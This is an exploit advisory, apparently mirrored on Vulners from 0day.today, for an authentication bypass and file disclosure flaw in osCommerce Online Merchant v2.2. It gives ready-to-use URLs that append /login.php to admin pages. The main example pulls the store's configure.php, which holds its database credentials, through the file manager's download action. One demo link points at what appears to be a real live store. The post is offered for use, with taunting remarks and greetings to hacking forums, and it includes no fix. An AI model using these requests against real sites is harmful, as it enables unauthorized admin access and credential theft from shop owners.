Lucene search
K

Oscommerce Online Merchant v2.2 File Disclosure / Admin ByPass

🗓️ 30 May 2010 00:00:00Reported by Flyff666Type 
zdt
 zdt
🔗 0day.today👁 24 Views

OsCommerce v2.2 Admin Bypass & File Disclosur

Code
==============================================================
Oscommerce Online Merchant v2.2 File Disclosure / Admin ByPass
==============================================================


Author : Flyff666
Date : May, 30, 2010
Location : Tangerang, Indonesia
Time Zone : GMT +7:00
Software : OsCommerce Online Merchant v2.2
Tested on : All OS
--------------------------------------------
Email : [email protected]
gReets : Mywisdom(abang.. wkkwkwk), Kiddies, Chaer, Petimati, c4uR
WhiteHat, Cruz3n, Gunslinger, v3n0m, z0mb13, Bumble_be
Spykit, BobyHikaru, Fribo. all member.
Site : Http://www.Devilzc0de.org/forum/
Forum : Http://Indonesianhacker.or.id/
--------------------------------------------
 
# ByPass Page Admin :
 
You can use this Trick if admin folder not protected by .htaccess
 
if you Want to explore admin page without login. You can use /login.php behind the name of the file
 
Example :
 
http://[site]/admin/backup.php/login.php
 
or
 
http://[site]/admin/file_manager.php/login.php
 
Demo :
 
http://server/store/admin/file_manager.php/login.php
 
You can See all file in Directory Oscommerce.. haha ;)
 
and you can download all file with tRick above
 
 
# File Disclosure :
 
in : admin/file_manager.php/login.php?action=download&filename=
 
Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
 
Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
 
Demo : http://thethirdeye.co.in/store/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php



#  0day.today [2018-03-14]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation